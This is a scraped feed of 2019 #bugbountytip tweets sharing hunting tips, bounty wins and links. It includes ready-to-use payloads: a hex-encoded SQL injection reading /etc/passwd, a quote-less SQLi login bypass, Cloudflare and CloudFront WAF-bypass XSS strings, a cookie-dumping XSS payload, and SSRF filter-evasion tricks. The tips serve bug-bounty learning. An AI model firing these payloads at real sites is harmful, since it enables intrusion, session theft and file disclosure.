2019-07-24 12:54:07
1 If a sqli target has magic quotes enabled you can avoid this by converting the string to Hex or Char. Example: load_file('/etc/passwd') = load_file(0x2f6574632f706173737764) Or load_file(chars(n1,n2,n2 [...])) #bugbounty #bugbountytip #bugbountytips #sqli
Alin Ciocoiu
@17Akun


2019-07-24 06:24:54
0 Hi. What note taking tools do you use for your projects? Cloud/non- cloud, but free. #pentest #pentesting #bugbountytip #bugbountytips
mayur gupta
@rootmayur


2019-07-24 04:51:13
0 I got 300$ for my submission๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/5BcAOrTsHP #bugbountytip #bugcrod #ethicalhacking
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 02:12:32
1 [ What I Learned Today : 03 ] #BugBounty #bugbountytip Indepth Bug Bounty Guide : https://t.co/e89Kne5bWf ๐Ÿ’ฐ Well written blog post by @officialpranj . For Newbies in Infosec - I recommend to read this blog post , twice in a week . ~ Thread : #0xWilt : @0xWilt
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 01:47:14
1 [ #Motivation #bugbounty #bugbountytip #infosec ] No one can spoonfeed youย everything You have to do itself You have to be Self learnerย or Independent learner If youโ€™ve lack of motivation to learn then your infosec career is end here Bcz Youโ€™re not going to get far in Infosec
Petko D. Petkov
@pdp


2019-07-23 22:12:59
0 Sometimes it will take 9 months to get your bugs triaged #bugbountytip
Learning Appsec
@learningappsec


2019-07-23 19:00:14
1 Enumerated all the live urls ? next what ? Open all of them at once in your browser using https://t.co/HDt8VcPYSm #bugbountytip #bugbounty #AppSec
Petko D. Petkov
@pdp


2019-07-23 17:52:06
0 Competition is for the suckers #bugbountytip
Proxy
@LinuxKodachi


2019-07-23 17:06:59
0 Want to test your programming and problem solving skills? Here we go : {๐Ÿ•ท} https://t.co/QXNsAcMuSL #Developer #programmers #bugbountytip
Pascal S
@PascalSec


2019-07-23 15:04:32
0 #BugBountyTip: If you use an automated Github secret scanner, make also sure to automate the GIT clone URL retrieval. Just created a GIST for that -> https://t.co/TPI4reVPZ1 Let me know if this is helpful and RT ๐Ÿ˜Ž
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 14:05:18
2 Hey Guys, Join me and many other infosec asiprants in this group named Nullcrowd - https://t.co/ahMK4OPqkP , The best infosec community. #BugBounty #bugbountytips #bugbountytip #infosec #infosec19 #hacking #programming #programminglife #cybersecurity
d4d
@d4d89704243


2019-07-23 11:47:46
0 Check my new exploit for #image #processing library. This time it is GraphicsMagick https://t.co/OmYiOr2d27 #exploit #bugbountytip #bugbounty
Petko D. Petkov
@pdp


2019-07-23 11:28:24
0 Out of scope bugs are worth reporting - if nothing else you are making a good impression #bugbountytip
midhun
@Midhunryann


2019-07-23 11:24:58
1 @Hacker0x01 bug type :ssrf.. Program :private reward : 300usd First reward #infosec #newbie #bugbounty #bugbountytip https://t.co/KwcO4IP9m6
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 02:02:12
2 [ What I Learned Today : 02 ] #BugBounty #bugbountytip #infosec #bugbountytips How does the internet works : Amazing whitepaper : ~ https://t.co/X3hEqNOUKD ๐Ÿ’ฐ I recommend everyone to read this because this is building block for Infosec ๐ŸŒˆ ~ Thread : #0xWilt
Ameen
@ameenmaali


2019-07-22 22:42:30
0 #bugbountytip: (IDORs) if an endpoints accepts a list of IDs and you get unauthorized for [โ€˜invalidIdโ€™] - try [โ€˜validIdโ€™, โ€˜invalidIdโ€™]. Itโ€™s very possible the validation only occurs on the first element or if any element is valid. Seen it many times
Rubyfu
@Rubyfu


2019-07-22 21:36:20
1 Do you want to bypass Regex based filters? Use regexp-examples gem. It generates a list of all* strings that will match the given regular expression. https://t.co/H42YQhF9na #Rubyfu #OWASP #Pentest #XSS #bugbountytip
bugbountylab
@artofbugbounty


2019-07-22 14:56:43
0 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/8zMAn4vtPG #OSWE #bugbountytips #bugbountytip https://t.co/1dMqzPXZij
expl0itc0der
@vanshitmalhotra


2019-07-22 13:07:13
1 A3 - Sensitive Data Exposure OWASP Juice Shop Tutorial - Exploiting Forgot Password #bugbountytip #BugBounty Video Link : https://t.co/wr92be0wXa
Brute Logic
@brutelogic


2019-07-22 12:52:30
4 Use a Microsoft browser like IE11 or Edge. They behave like Burp and curl. #XSS #bugbountytip ๐Ÿ˜‰ https://t.co/xSWgm3EchU
Mohammed Shine
@MohammedShine8


2019-07-22 12:42:29
0 #sqli with no quotes Username: \ Password:||1# #bugbounty #bugbountytip
Khan Sahab ๐Ÿ‡ฎ๐Ÿ‡ณ
@UbaidAhmed


2019-07-22 07:46:24
0 Why do many programs do not consider taking screenshot of Credit Card Information screen as a vulnerability? #bugbounty #bugbountytip #infosec
Ameen
@ameenmaali


2019-07-22 07:31:18
5 Been triaging #bugbounty for a couple years and not once seen a XSS report showing impact - I try to do it for each I find. Itโ€™s such an easy way to raise the severity with little effort. Look for ATO (email, password change), access to sensitive data/functionality #bugbountytip
ghostlulz
@ghostlulz1337


2019-07-22 00:14:25
0 Exploit development is the new black. Want to get an easy to understand rundown of buffer overflow attacks check out this : https://t.co/FejHKKoPk4 #bugbountytip #infosec #redteam #exploit #osint #pentest #exploiting #security #Assembly #bufferoverflow #apt #hacking #pentest
Yadhavi
@PrincessYadhavi


2019-07-21 22:51:16
0 After upgrading recon-ng to version 5 in kali , recon-ng does not showing any modules. It tells "[*] No modules enabled/installed." How to solve this? #bugbounty #recon-ng #reconng #bugbountytip cc: @LaNMaSteR53
bugbountylab
@artofbugbounty


2019-07-21 17:49:18
1 Get Your Latest Currency Exchange Rates | Refreshing In Every 30 Seconds Mission: Craft a payload link that causes the page stop loading completely through regular expression Denial of Service (ReDoS). https://t.co/8t3nJnhrwr #bugbounty #bugbountytip #bugbountytips #appsec https://t.co/4o3tWcGs4h
pi0wlz
@pi0wlz


2019-07-21 17:37:18
0 #bugbountytip When you run Amass and got a big list with Search engines parse with $ cat amass-findings | sed -e 's/\[[^][]*\]//g' | sed 's/^[ \t]*//;s/[ \t]*$//'
Nikos Gkogkos
@ngkogkos


2019-07-21 11:12:08
1 Love @owaspamass, wordlist masks open so many possibilities! Obversiving already known subdomains and other naming conventions of the organisation in combination with this could help spot crazy subdomains. #bugbounty #bugbountytip #recon https://t.co/n0iap7t4nZ
Rapid Safeguard
@RapidSafeguard


2019-07-21 04:40:21
0 Self contained htaccess shells and attacks https://t.co/U3THkDJ3Ql #infosec #bugbountytip #bugbounty
bugbountylab
@artofbugbounty


2019-07-21 01:46:24
0 Discover Secret Key from a subdomain disclosed via a Github code repository https://t.co/3MVFLLLHze #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/uztLdgrW5E
ู…ุญู…ุฏู†
@mwamiaim


2019-07-20 14:03:15
1 Anyone has a good resource for SSRF Payloads ? #bugbountytip #bugbountytips #Bugbounty
bugbountylab
@artofbugbounty


2019-07-20 12:55:50
0 @NathOnSecurity Cool. It's surprising to get rewarded with weak ssl/tls issues. Thanks for the share. #bugbountytips #bugbountytip
Murdockz
@Murdockz_CEH


2019-07-20 12:15:42
1 AWS S3 buckets do not allow for capital letters in the s3 bucket name. Using a tool like @TomNomNom gf will allow you to find all s3 buckets and sometimes they include capital letters. This will allow for s3 bucket takeovers. My recent s3 takeover. #bugbountytip #bugbountytips
bl4de
@_bl4de


2019-07-20 12:14:16
5 Default #passwords list #hacking #itsecurity #bugbountytip #pentesting https://t.co/tldQUMtFDg
bl4de
@_bl4de


2019-07-20 12:11:20
4 #GTFOBins is a curated list of #Unix binaries that can be exploited by an attacker to bypass local security restrictions. #Linux #hacking #itsecurity #DevOps #PenTesting #bugbountytip https://t.co/50z447IFRc
0xd0m7
@0xd0m7


2019-07-20 09:00:10
1 #bugbountytip Sometimes you will recieve a 400 bad request if you are fuzzing with double slash: Solved with a match replace rule!! // > / https://t.co/xTMnrhHOOQ
Mehmet Aura
@rootauraw


2019-07-20 06:20:01
1 Yay! I got 125$ from a PRIVATE program on BUGCROWD for UNCLAIMED SOCIAL MEDIA ACCOUNT using my SCRIPT. โค๏ธ (https://t.co/BcU0KfqJgh ) Thanks to @bugraeskici #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd
bugbountymemes
@bugbounty_memes


2019-07-20 05:49:17
0 Domaim has url :- "Example(.)com/abcd/xyz" ! "Inurl:abcd inurl:xyz" helped me to get internal IP (X.X.X.X/abcd/xyz) I got 50$ for this #bugbountytip #hackerone #bugbounty #bugcrowd
Frederick Alcantara
@sirfreddyal


2019-07-20 01:47:15
1 Quick guide on Web App Security for any developers out there https://t.co/qNO9UUaj4f #javascript #dApp #webdev #php #python #bugbounties #bugbountytip #pentest
ghostlulz
@ghostlulz1337


2019-07-19 17:33:27
1 If you like easy wins go to github and find exposed credentials. Iv personally used this tool on a few engagements itโ€™s great ! #infosec #bugbountytip #redteam #osint #bugbountytips #bugbounty https://t.co/Xf3T7CmWPF
HAHWUL
@hahwul


2019-07-19 16:51:15
1 My toy project! I have now released the XSS scanning library. The name is "XSpear". It is a small and simple project, but I hope it any use well. (Probably a lot of bugs.......) Thx! https://t.co/RNeObHB3kz https://t.co/Xa4zLYKAEq #XSS #BugBounty #bugbountytip #Hacking #Ruby
Rob Fitzpatrick
@rpfitzpatrick


2019-07-19 15:05:57
0 I know it seems obvious. But Slack notifications for your bug hunting automation are a godsend. #bugbountytip https://t.co/4bpDFpwbbB
securibee ๐Ÿ
@securibee


2019-07-19 14:02:10
0 When in doubt, upload All The Things. https://t.co/towFxaHpke #bugbountytip #infosec
cybersecurity.wtf
@CyberSecWTF


2019-07-19 13:54:05
0 @Alra3ees Thanks for the share. Replicated in Lab with a ten-year-old subdomain. #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/FZVVCpl4YO https://t.co/xCLont0mcm
m0z
@LooseSecurity


2019-07-19 13:52:55
2 #bugbountytip #bugbounty #bugbountytips #infosec If a bounty program has upload servers in-scope, try uploading an SVG. Some endpoints might block it, but it doesn't mean they all do! SVGs can include HTML/JS and lead to stored XSS.
m0z
@LooseSecurity


2019-07-19 12:52:35
2 #bugbounty #bugbountytip #bugbountytips #infosec When doing a bug bounty always read previous reports. It helps you figure out what kind of issues existed in the application in the past and saves a lot of time on reconnaissance.
D3cy9h4
@DecyphaC


2019-07-19 12:23:53
2 They either think Google chrome is unhackabke, or they taking there security serious??! But will be a result if we do find a bug ๐Ÿ˜ #BugBounty #infosec #bugbountytip https://t.co/WJz2gAAT0V
ghost_rider_0x90
@gh0st_R1d3r_0x9


2019-07-19 10:00:47
0 Anyone ever encountered Regex based DOS vulnerability? I saw the vulnerable code but need help with POC. #BugBounty #bugbountytip #bugbountytips
kassih mouhssine
@KassihMouhssine


2019-07-19 09:43:09
0 New bug at @mailru i have bypass the filter and get a nice stored xss i get 150$ bounty but the probleme here the payload just alert(1) nothing else :'( @Hacker0x01 #bugbounty #infosec #BugBountyTip https://t.co/8wPI0fBq0c
Ammar Amer
@cry__pto


2019-07-19 09:37:39
3 i have uploded hundreds of articles about all field of the hacking science as a pdf files to my github repository .the updates will continue to arrive to the repository until it reach 2000 links& pdf files,at any time soon. https://t.co/q2layzVpKz #bugbountytip #OSINT #Malware
Sarvagya Sagar
@0ffensivemitthu


2019-07-19 05:15:22
5 -- "Fall in love with Regexโ€ by Sarvagya Sagar https://t.co/bsRojqvuXy : This article willnโ€™t give you a magical power . Main purpose of this article is to serve as an first aid to newbies . [ #BugBounty #bugbountytip #infosec #CyberSecurity #bugbountytips #hacking #programmer ]
cybersecurity.wtf
@CyberSecWTF


2019-07-19 01:25:12
0 @HusseiN98D Congrats :) Always love that find. Replicated it in lab #bugbountytips #bugbountytip https://t.co/PEpNpJXjqr https://t.co/tJGRT2OJ3u
healthyoutlet
@healthyoutlet


2019-07-18 17:43:21
0 #bugbountytip the careers section of a website can leak information you might not find elsewhere. If they're looking to hire someone who has experience with some tech you didn't find during recon that might be a clue where else to dig.
cybersecurity.wtf
@CyberSecWTF


2019-07-18 14:45:45
0 @cnotin Oh damn. That's a good point. Thanks for sharing. I've made it available for practice in Lab https://t.co/W0YH06Fp6o #bugbountytip #appsec https://t.co/AmBsGsvy1Z
Sarvagya Sagar
@0ffensivemitthu


2019-07-18 05:41:54
0 [ #BugBounty #bugbountytip ] -- ๐Ÿ’ฐ CRLF Injection Attack Vedio : https://t.co/5CFxKKosiG Writeup : https://t.co/ZO8QytNJ42 or https://t.co/MmKNu3hMau or https://t.co/rM8kZu6GHP Cheatsheet : https://t.co/EnybRyA7AA
ghostlulz
@ghostlulz1337


2019-07-18 03:55:59
1 Winner Winner Chicken Dinner. If your not using the waybackmachine to find vulnerable endpoints you might be missing out on some bug bounty money. More info on my blog: https://t.co/IcaV2mPjQV #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #waybackmachine
ph0rensic
@ph0rensic


2019-07-17 23:49:47
0 Shodan search RUBY DEBUG html:"secret_key_base" html:"rack.version" #bugbountytip #BugBounty
sagar yadav
@sagaryadav8742


2019-07-17 20:08:54
1 3rd bounty of this month ๐Ÿ˜Š๐Ÿ˜Š๐Ÿ˜Š It's time to plant some new tree's ๐ŸŒฑ Secure_website and Secure-nature #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty https://t.co/fd60QKMJXj
SaadAhmed
@XSaadAhmedX


2019-07-17 17:40:54
2 Thinking of making a RECON web based tool using flask + python ๐Ÿ˜€ Need suggestion what you want in this tool please share ideas along reference ๐Ÿ˜‰ #BugBounty #infosec #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2019-07-17 13:35:15
0 #bugbountytip There ARE bugs that haven't been found, just keep looking. https://t.co/dQmf6tzHbY
Sarvagya Sagar
@0ffensivemitthu


2019-07-17 13:30:41
3 [ #bugbounty #bugbountytip ] - HTML Injection ๐Ÿ”ฅ Intro : https://t.co/CVABpaoutF Video : https://t.co/p3EsNso7y3 Writeup : https://t.co/sZ6CGqcuW8 or https://t.co/wG9l0Bhh2v or https://t.co/TJZQdVe9dC or https://t.co/XXsHNAO8ob or https://t.co/o2MQEj5buw
Ishaq Mohammed
@security_prince


2019-07-17 13:19:12
3 If you have your input reflecting in a javascript variable simply close the context with </script> and start a new <script> tag for #xss thanks to @s0md3v @brutelogic for sharing thier awesome research on xss #xss #bugbountytips #bugbountytip #bugbounty https://t.co/DRtHXi4TFB
Evan
@evanricafort


2019-07-17 11:48:15
0 Fun #BugBountyTip: distribute your blind-XSS payload to any of your target and maybe one day it will fire up on their end if they will be having a end of quarter checking/validation :p
Samet ลžAHฤฐN
@sametsahinnet


2019-07-17 11:46:41
0 A simple #BugBountytip about deep subdomain search : Google dork > site:*.*.target.com #BugBounty
Dhamu
@Dhamuharker


2019-07-17 07:16:51
1 #bugbountytip #bugbounty Story of my Biggest Bounty ever : Command Execution on Jenkin https://t.co/GtJFtgKw74
bl4de
@_bl4de


2019-07-16 19:52:17
1 Sometimes, when you run off the ideas, it's good to back to basics ๐Ÿ˜‰ #bugbountytip #hacking #webappsec #WAHH @PortSwigger @DafyddStuttard https://t.co/zatsQY45MC
ฮกRฮ›SฮžUDฮŸ
@praseudo


2019-07-16 19:33:33
1 Some android hacking related #bugbounty #androidsecurity #androidhacking #infosec #bugbountytip https://t.co/agYj45YgSe
Dan Field
@Surfrdan


2019-07-16 18:41:43
0 @nahoragg @Hacker0x01 Nicely done! And great #bugbountytip in the thread. Monitoring is key with large scopes.
Leonel Emiliano
@leoalgare


2019-07-16 13:35:19
0 Yay, I was awarded a $700 bounty on @Hacker0x01! Reflected XSS + unrestricted CSP leads to account takeover. (High severity) Weaponize your xss payloads and show the real impact #bugbountytip #bugbountytips https://t.co/UA8jUEN1ss #TogetherWeHitHarder
cybersecurity.wtf
@CyberSecWTF


2019-07-16 12:24:22
0 @0xInfection Now available for practice in lab https://t.co/Zp8nolQIhq #bugbountytip https://t.co/1LyHcMD6JR
Shammah Agwor
@Zealsham


2019-07-16 12:20:56
0 If you query a Jira api endpoint and you are getting an empty result , try to find the jira login page of your target . A temporary session cookie with will be given to you . You can use this to query the endpoint and get a valid result #BugBounty #bugbountytip
Brute Logic
@brutelogic


2019-07-16 11:41:15
2 Check this writeup! #XSS #bugbountytip https://t.co/BNFapWjYqg
Mads
@iGotRootBlog


2019-07-16 10:47:07
0 Reading manpages can teach you so much. Just found out you can get exploits from a XML nmap file through searchsploit Example with verbose flag for real time results: searchsploit -v --nmap nmapfile.xml Time to automate this? I think so! #bugbountytip #pentesting #bugbountytips
YS
@YShahinzadeh


2019-07-16 10:00:21
1 site-a has open redirect limited to site-b or x.site-a. The browser will keep the # of URL. site-a/?url=site-b/path#payload -> site-b/path#payload the same for x.site-a. You might take advantage of full redirect and stealing an auth token #bugbounty #bugbountytip
SaadAhmed
@XSaadAhmedX


2019-07-16 07:20:45
3 Here Is the Write-up how I use Click Jacking to exploit CSRF https://t.co/o3mNTG47U6 #bugbountytip #bugbountytips #bugbounty @Bugcrowd
Sarvagya Sagar
@0ffensivemitthu


2019-07-16 06:30:58
1 [ Capture Session Token ] wget -q --save-cookies=cookie.txt --keep-session-cookies --post-data="username: admin&password=pass&Login=Login" http://target/login.php #BugBounty #bugbountytip #bugbountytips #infosec ๐ŸŒˆ
Shammah Agwor
@Zealsham


2019-07-16 00:45:23
0 Letโ€™s not forget that @yaworsk started this whole streaming thing with his PRO TIPs series #BugBounty #bugbountytip
cybersecurity.wtf
@CyberSecWTF


2019-07-15 18:25:52
0 H1 top 15 most common vulnerabilities #appsec #bugbountytip https://t.co/wqsqrUeibX
Abugzlife
@abugzlife1


2019-07-15 14:33:12
6 New post about the not so special bugs out there. Hopefully this will help motivate beginners that are struggling to see the light at the end of the tunnel, and show some of the very simple, impactful bugs out there. https://t.co/Ti0DlwgYR8 #bugbounty #bugbountytip #infosec
[email protected]ล™ฤท KลˆฤฑฤŸhลฅ
@eye100_eagle


2019-07-15 13:04:07
0 $500 000 Bug Bounty Campaign https://t.co/ZdytT3Pg8D #bugbounty #hackerone #bugbountytip #ItTakesaCrowd
Emre Selim
@emre_selim8


2019-07-15 10:02:03
0 I was 2th hacker at Hall of Fame of Ford in 3 days. How did i do this? ๐Ÿ˜‹ #bugbounty #hackerone #halloffame #bugbountytip https://t.co/1rt3KpZCWs
Tismayil
@Tismayil1


2019-07-15 08:18:35
0 Good Weeks. #bugbountytip @Hacker0x01 https://t.co/xJfdyCvm5r
Wh11teW0lf
@Wh11teW0lf


2019-07-15 06:44:20
0 #bugbountytip Always visit Out of Scope subdomains and domains to get new endpoints for In Scope targets!
ghostlulz
@ghostlulz1337


2019-07-14 21:29:10
1 Do you like hacking? Doing you like learning new offensive security techniques? Do you like making money with bugbounties? If so check this out: https://t.co/pAdnbe5VeU #BugBounty #bugbountytip #bugbountytips #infosec #redteam #dfir #Pentesting #hacking #hacker #osint #offsec
Th3G3nt3lman
@Th3G3nt3lman


2019-07-14 15:02:21
6 1) Amass one of the new target domains, nothing good 3) Search github and found a subdomain "k8s" 4) The site responded with K8s clusters names & details 5) Added the names to altdns wordlist, Run 6) 4 subdomains appeared & unauthorized access to K8s Dashboards ๐Ÿ˜… #bugbountytip
bl4de
@_bl4de


2019-07-14 08:11:09
2 Here's why manual exploitation will always win with automated tools ๐Ÿ˜ฌ Also, here's the reason why you should read #bugbounty writeups ๐Ÿ˜ Great catch by @h1_sp1d3r inspired by @gerben_javado post #hacking #itsecurity #bugbountytip #searchingforholes https://t.co/NipaLOv8D7 https://t.co/qrIF1uW6k8
Richard Strnad
@NateTheRiver


2019-07-12 13:37:29
0 Pretty useful when you forget to start some long-running scan via nohup command or in tmux/screen session. #bugbountytip #bugbountytips #Linux https://t.co/ofhPGEpzEv
Sarvagya Sagar
@0ffensivemitthu


2019-07-12 10:20:21
0 [ #BugBounty #bugbountytip ] - Cross site request forgery ๐Ÿ’ฐ Video : https://t.co/0W0FfO385m Paper : https://t.co/IE1UEx1ApU or https://t.co/m3h6mYdblI Cheatsheet : https://t.co/FVweb3zDCG Writeup : https://t.co/RZg50gukWu or https://t.co/NwHDQOmKo8 or https://t.co/7SoDFPXLxN
Hussein Daher
@HusseiN98D


2019-07-11 22:31:03
0 What is your manual recon approach? Mine: -Github -Censys -Shodan -Google dorks -Bing search #bugbountytip #bugbountytips #bugbounty
Cyberthereaper
@Cyberthereaper3


2019-07-11 18:45:25
1 I earned 500$ for my Submission on HackerOne โค #Hacker0x01 โค๏ธ #hackerone โค #bugbountytip โค #infosec โค
securibee ๐Ÿ
@securibee


2019-07-11 18:36:18
0 dedupe and sort your wordlist in place sort -u -o wordlist.txt wordlist.txt #bugbountytip #infosec
Ben Sadeghipour
@NahamSec


2019-07-11 15:30:34
6 Here's this weeks Bug Bounty Protip! If you have some tips you'd like me to share, send them my way and I may use them for in the future. More on my stream this Sunday at 10:00am PDT! #bugbountytip https://t.co/pnw3EFhVWO
HackIsOn ยฎ
@hackison


2019-07-11 12:05:09
3 Cloudflare #WAF Bypass Just use {alert`1`} instead of alert(1). Any #XSS vector will work (except <script>). #BruteTips #bugbounty #bugbountytips #bugbountytip #Https #malware #vulnerability #webdev #CMS #opensource #Linux #API #infosec #DDoS https://t.co/MZNlWR8wGn
c0mr3x
@c0mr3x


2019-07-11 11:50:57
0 Found XSS in private bug-bounty .. document was filtered, so as () .. my final payload -> javascript:setTimeout`\x64ocument.write\x28\x64ocument.\x63ookie\x29` #bugbountytip #BugBounty
Petko D. Petkov
@pdp


2019-07-10 17:48:17
1 โ€œIf you set your goals ridiculously high and itโ€™s a failure, you will fail above everyone elseโ€™s success.โ€ โ€” James Cameron #bugbountytip
Sฮ›KYB
@sakyb7


2019-07-10 15:41:46
0 Here is writeup for an interesting Account takeover vulnerability. #bugbounty #bugbountytip #TogetherWeHitHarder https://t.co/aZe7EB0SYY
Tyrell Wellick
@TyrellWellick00


2019-07-10 15:15:14
0 Just found an app which keep its chat backup in plain text. @three_cube #bugbountytip #messaging #Hackers Pro tip : Always try to access the chat database of the messaging or chatting app you use. I was able to access the messages in the plain text. https://t.co/sq4n7wI2TV
Fisher
@Regala_


2019-07-10 08:59:14
0 It's that time of the year ๐Ÿฅณ๐Ÿ™ @Burp_Suite #bugbounty #bugbountytip https://t.co/pKonoklXxL
Touhid M Shaikh
@touhidshaikh22


2019-07-09 23:51:12
0 Subdomain Takeover Basic Understanding https://t.co/PcSPMI33IT #BugBounty #BugBountyTip #subdomain #basic https://t.co/Q3pNvsOwQH
Mike Lierman
@MikeLierman


2019-07-09 22:06:18
0 @0xInfection #infosec #bugbounty #bugbountytip What. No way. I didn't know this!
Nikos Gkogkos
@ngkogkos


2019-07-09 20:27:29
0 Email clients' browser engines are fascinating! Often you can control the layout of generated emails by messing with HTML/CSS. Example payloads to affect how emails render: <% <!-- <p style="display:none;" <div style="visibility:hidden"> #BugBounty #BugBountyTip #BugBountyTips
Ammar Amer
@cry__pto


2019-07-09 13:46:09
2 1500 link to awesome resources and the number will continue get higher until it reach 2000 link during the next few coming days. #BugBounty #Hacking #Malware #redteam #cybersecurity #infosec #pentest #BugBountyTip https://t.co/q2layzVpKz https://t.co/2XyhkruBx7
David Vieira-Kurz
@secalert


2019-07-09 09:41:19
0 Besides @Burp_Suite, CIRT nikto and nmap with NSE ... which other web security scanner would you recommend these days which costs max $500 pro year AND work on mac/linux? #infosec #BugBounty #BugBountyTip #bugbountytips
alias ls=' rm -rf /'
@spyerror


2019-07-09 06:53:23
0 Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex. Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #Bypass #WAF #XSS #Cloudflare #BugBountyTip
Coding_Karma
@karma_coded


2019-07-08 21:38:01
0 That moment when you fuck around with APIs for PII leakage then find a file that has it all and no access control configuration chain with IDOR and BAM entire DB ๐Ÿคฏ๐Ÿ˜‚ #bugbounty #bugbountytip #infosec #security https://t.co/L4P8vfzTG2
securibee ๐Ÿ
@securibee


2019-07-08 19:59:27
0 https://t.co/kG7era7rGr analyze a chrome extensions risk before using it by @duo_labs be safe out there. #infosec #bugbountytip
Ammar Amer
@cry__pto


2019-07-08 17:34:47
1 Obtaining Login Tokens for an Outlook, Office or Azure Account. https://t.co/0uHH0nM2XI #BugBounty #bugbountytip
alias ls=' rm -rf /'
@spyerror


2019-07-08 17:05:29
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #BugBountyTip #WAF #Researcher #Bug #Security #BugBounty
Infected Drake
@0xInfection


2019-07-08 16:26:48
12 I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 โ†’ http://1.1 http://192.168.0.1 โ†’ http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. #infosec #bugbounty #bugbountytip https://t.co/2zcrLCmq0R
healthyoutlet
@healthyoutlet


2019-07-08 15:55:58
0 what's one of the lesser-known tools in your bug bounty arsenal? I'm not sure how many of you are using this one but I do a lot of API testing with postman https://t.co/SBo6D8qPKN #bugbounty #bugbountytip
bl4de
@_bl4de


2019-07-08 15:35:25
3 One of the best set of #bugbountytips ever, in one thread Read, learn, use daily and share with others ๐Ÿ˜ #BugBounty #bugbountytip #hacking #PenTest #ITSecurity https://t.co/nL4Co2SBNs
Fisher
@Regala_


2019-07-08 15:18:28
2 Awesome thread of bounty tips by @pdp ๐Ÿฅณ๐Ÿฅณ๐Ÿฅณ #bugbounty #bugbountytip https://t.co/x48UW2of2G
Hussein Daher
@HusseiN98D


2019-07-08 12:47:18
2 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #BugBountyTip
alias ls=' rm -rf /'
@spyerror


2019-07-08 12:07:53
2 Another #Cloudflare #XSS #Bypass xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> #WAF #BugBounty #BugBountyTip
chouaib Hm
@chouaibhm


2019-07-08 10:55:49
0 Abusing PHP Query String parser bypass IDS/IPS/WAF #bugbountytip #infosec #Pentesting #BugBounty https://t.co/JdZbeT4GGt
David Vieira-Kurz
@secalert


2019-07-08 10:03:17
1 who else is attending Global AppSec - Amsterdam (September 23-27) this year? #infosec #BugBounty #bugbountytip
alias ls=' rm -rf /'
@spyerror


2019-07-08 07:51:27
0 While the money is still in the hands, in the near future, everyone will witness, although only a part will witness. #WAF #BugBounty #BugBountyTip #Cyber #Researcher
Ammar Amer
@cry__pto


2019-07-08 06:57:29
2 check out the new awesome resources in my repository.i had added 87 link to advanced resources to my github repository . and the number will reach 2000 link .at any time soon. #OSINT #Hacking #PenTest #redteam #malware #CyberSecurity #BugBountyTip https://t.co/q2layzVpKz https://t.co/EF7u0ghngC
incredincomp
@incredincomp


2019-07-08 04:07:45
2 Is the private IP scheme disclosure considered a bug or should I literally be trying to pivot to a different OSI layer(and if I cant, should I still report that I know how to find more info)? Obviously scope aware, just curious if anyone'd care. I would #bugbounty #bugbountytip
Michael Blake
@Michael1026H1


2019-07-08 03:12:43
0 #bugbountytip Need a redirect, maybe a 301 or 303? Use https://t.co/YyaeYQFrkP to get a quick URL. You can configure it using this guide https://t.co/jUbe32eeJq Great for SSRF.
Bug Bounty TuT
@BugTut


2019-07-07 20:10:49
0 Guide 001 |Getting Started in Bug Bounty Hunting.. Start Bug Bounty 1st To Last.. Thanks To @KHIZER_JAVED47 Article Link:- https://t.co/CrabN9jmjz #BugHunting #BugBounty #BugBountyTip #bugbountytips https://t.co/DL2zcol7CI
Amit Dubey
@MrR0Y4L3


2019-07-07 15:59:16
0 Burp suite extensions which I found quite useful - 1. ActiveScan++ 2. Knife (https://t.co/C9kkI166eA) 3. SSLScan 4. AutoRepeater 5. Software Vulnerability Scanner 6. Logger++ 7. ErrorMessageCheck Suggestions are welcome :) #burpsuite #pentest #infosec #BugBountyTip #bugbounty
Nikos Gkogkos
@ngkogkos


2019-07-07 14:03:11
0 If you are like me, running hundreds of #gobusters, you may find this #bash function useful, it cats X most recent output files. Assumes all output is under CWD, & "may" work w/ mixed output files. Grep by "Found:", length.. See comments for code. #BugBountyTip #pentest #infosec https://t.co/dsy0tuX2Yq
Hussein Daher
@HusseiN98D


2019-07-07 13:47:43
4 An overview of what I did for my recent $10 000 bug. Always go for the highest impact! #bugbounty #bugbountytips #bugbountytip https://t.co/DnHxbneXuN
Nikos Gkogkos
@ngkogkos


2019-07-07 13:34:20
0 If you are like me, running hundreds of #gobusters, you may find this #bash function useful, it cats X most recent output files. Assumes all output is under CWD, & "may" work w/ mixed output files. Grep by "Found:", length.. See comments for code. #BugBountyTip #pentest #infosec
Sarvagya Sagar
@0ffensivemitthu


2019-07-07 12:34:01
1 [ My Blog Post #02 ] -- Repost : Read this , Definitely you'll fall in love with Regex : โ€œFall in love with Regexโ€ by Sarvagya Sagar https://t.co/7a9Cd89oXR ๐ŸŒˆ #BugBounty #bugbountytips #BugBountyTip #infosec #infosec19 #CyberSecurity
Securisec ๐Ÿš€
@securisec


2019-07-07 04:16:41
0 "RT RT 0ffensivemitthu: [ #BugBounty #BugBountyTip ] -- ๐Ÿ’ฐ HTTP Parameter Polution Intro : https://t.co/OKBqqZF4Bj Slide : https://t.co/VEBRb0yY4N Writeup : https://t.co/ztjLNd2OAO or https://t.co/Zn2HnUb3KO Report : https://t.co/oiTVmyXxKn or https://t.co/PSDeo1D7dM ๐ŸŒˆ"
Ammar Amer
@cry__pto


2019-07-07 00:13:09
2 and now there is 1300 link to important resources in the world of hacking. check out the new links about redteam,exploit development ,oscp,,etc. #BugBountyTip #Hacker #infosec #exploitation https://t.co/ldxTY0MZIt https://t.co/PF1Q8znOCz
Ammar Amer
@cry__pto

